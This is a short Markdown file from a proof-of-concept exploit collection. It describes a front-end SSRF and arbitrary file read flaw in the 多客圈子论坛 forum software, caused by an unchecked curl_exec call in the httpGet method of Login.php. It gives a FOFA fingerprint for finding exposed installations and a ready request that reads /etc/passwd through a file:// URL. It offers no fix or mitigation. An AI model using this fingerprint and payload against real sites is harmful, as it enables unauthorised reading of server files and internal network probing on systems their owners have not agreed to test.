POC00/多客圈子论坛前台SSRF漏洞.md
2024-06-21 20:01:18 +08:00

21 lines
476 B
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 多客圈子论坛前台SSRF漏洞
/app/api/controller/Login.php 控制器中httpGet方法存在curl_exec函数且传参可控导致任意文件读取+SSRF漏洞
## fofa
```
"/static/index/js/jweixin-1.2.0.js"
```
## poc
```
/index.php/api/login/httpGet?url=file:///etc/passwd
```
![image-20240621195011935](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211950983.png)
## 漏洞来源
- https://mp.weixin.qq.com/s/S12FdNBxJXyS8QXrEHOTfg